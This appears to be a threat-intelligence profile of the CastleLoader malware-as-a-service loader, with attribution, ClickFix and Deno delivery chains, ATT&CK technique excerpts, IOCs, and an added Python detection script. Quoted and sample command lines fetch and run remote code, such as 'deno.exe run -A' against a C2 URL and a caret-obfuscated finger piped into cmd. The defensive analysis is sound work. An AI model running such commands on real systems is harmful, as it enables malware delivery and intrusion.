CastleLoader
CastleLoader is a modular malware loader sold under a malware-as-a-service model and used by multiple affiliates and threat clusters. Reporting links it most consistently to the actor tracked as GrayBravo, formerly TAG-150, and some research also notes overlaps with MuddyWater through shared code-signing certificates and delivery chains involving FakeSet. It has been used in campaigns targeting government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries.
Observed delivery vectors include ClickFix social-engineering chains, bogus GitHub and SourceForge repositories, fake installers, Deno-based multi-stage chains, NSIS installers, and infection flows using Inno Setup and AutoIt. Multiple reports describe users being tricked into executing commands copied from fake CAPTCHA or software-installation pages. CastleLoader has also been delivered by FakeSet and used in chains that ultimately deploy LummaC2, NetSupport RAT, Rhadamanthys, StealC, RedLine, DeerStealer, SectopRAT, and CastleRAT; one report also describes an in-memory .NET stealer dubbed CastleStealer delivered as a task from CastleLoader.
Technically, CastleLoader is described as a stealthy first-stage loader focused on flexible payload deployment and in-memory execution. Reported behaviors include configuration decryption in heap memory, RC4-encrypted next-stage retrieval, ChaCha20- or ChaCha-encrypted C2 traffic, custom serialized tasking, host profiling, anti-VM checks, optional screenshot capture, installed-AV enumeration, and execution-status reporting. Specific analyses describe hashed API resolution, XOR-obfuscated strings, reflective PE loading, direct ntdll syscall usage, ReplaceTextW callback execution, process hollowing, and geofencing or language/location checks. It has been observed collecting host metadata such as username, computer name, domain name, Windows version, architecture, and antivirus products before requesting tasks.
Infrastructure and indicators directly mentioned in the content include C2 domains and URLs such as maybedontbanplease[.]com, trindastal[.]com, sedaliarealty[.]net, and historical infrastructure at 94[.]159[.]113[.]32 and 38[.]180[.]136[.]139. One report states CastleLoader used the User-Agent string "GoogeBot." Additional indicators include campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89, auth token D63TnQ3WhSnjI0yVKaILRu8U1WttdnE, instance ID YvAPcF0OnjSYuDW7QosQ, hardcoded ChaCha20 key f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb, nonce bbbbf632514c0caae655b2c4, and sample hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 for the CastleLoader core. Related certificate artifacts mentioned in reporting include Common Names Amy Cherne and Donald Gay, and an EV-signed NSIS sample using a certificate issued to SERPENTINE SOLAR LIMITED.
Groups observed using it
4 distinct threat actors attributed by public researchers.
Threat actor TAG-150 has advanced its CastleLoader malware operations with the development of a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (8 techniques)
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
Persistence (2 techniques)
Privilege Escalation (5 techniques)
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Stealth (9 techniques)
The payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
The malware generates a randomized filename under %LocalAppData% directory and assigns it as a disguised executable path (e.g. 1006326830900030409.com or 1006326830900030409.exe). Next, this file is then used as a renamed copy of the legitimate Windows curl.exe binary.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
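As an added defender-side illustration (not code from the page or from any of the cited reports), the following Python scans constructed Windows process-creation events for three observable traits of the chain described above: a caret-obfuscated finger invocation piped into another process, deno.exe run -A against a remote URL, and a long all-numeric .com/.exe dropped directly under %LocalAppData%. The event field names, sample paths and the 203.0.113.10 address are assumptions; the caret-stripping normalization is the key step, because a literal match on "finger" would miss fin^ger.

```python
import re

# Constructed sample process-creation events (not from the page or real telemetry);
# the command lines are modelled on the ClickFix chain described above.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /min /c "fin^ger user@203.0.113.10 | cmd"'},
    {"image": r"C:\Users\alice\AppData\Local\deno\deno.exe",
     "cmdline": r"deno.exe run -A http://203.0.113.10/kx9q2p.js"},
    {"image": r"C:\Users\alice\AppData\Local\1006326830900030409.com",
     "cmdline": r"1006326830900030409.com -s -o stage2.bin http://203.0.113.10/s"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

def normalize_cmdline(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (fin^ger -> finger) and lowercase for matching."""
    return cmdline.replace("^", "").lower()

# Each rule: (name, event field to inspect, pattern applied to the normalized value)
RULES = [
    # finger output piped into another process: LOLBin download-and-run
    ("finger_lolbin_pipe", "cmdline",
     re.compile(r"\bfinger(\.exe)?\b[^|]*\|")),
    # deno run -A against a remote URL: full-permission execution of a fetched script
    ("deno_remote_script", "cmdline",
     re.compile(r"\bdeno(\.exe)?\s+run\s+-a\s+https?://")),
    # long all-numeric .com/.exe directly under %LocalAppData% (renamed curl.exe)
    ("numeric_binary_localappdata", "image",
     re.compile(r"\\appdata\\local\\\d{10,}\.(com|exe)$")),
]

def classify(event: dict) -> list:
    """Return the names of all rules matched by one process-creation event."""
    fields = {"cmdline": normalize_cmdline(event["cmdline"]),
              "image": event["image"].lower()}
    return [name for name, field, pat in RULES if pat.search(fields[field])]

def scan(events) -> dict:
    """Map each matched event's image path to its rule hits; clean events are omitted."""
    hits = {}
    for ev in events:
        matched = classify(ev)
        if matched:
            hits[ev["image"]] = matched
    return hits

if __name__ == "__main__":
    for image, names in scan(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(names)}")
```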
Credential Access (2 techniques)
Discovery (3 techniques)
The loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
Collection (3 techniques)
Command and Control (4 techniques)
The resulting decompressed payload reveals behavior consistent with secondary-stage command-and-control (C2) activity. It initiates outbound connections to retrieve additional payloads...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
IOCs tracked for this family
112 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
41 sources tracked across advisories, community write-ups, and news.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.
A multi-stage malware loader delivered via a ClickFix-style social engineering chain. It uses finger.exe, BYOI with a legitimate Python embed package, shellcode, reflective PE loading, encrypted C2 traffic, tasking, persistence options, screenshot capture, and multiple launch methods to deliver follow-on payloads including NetSupport RAT and a stealer.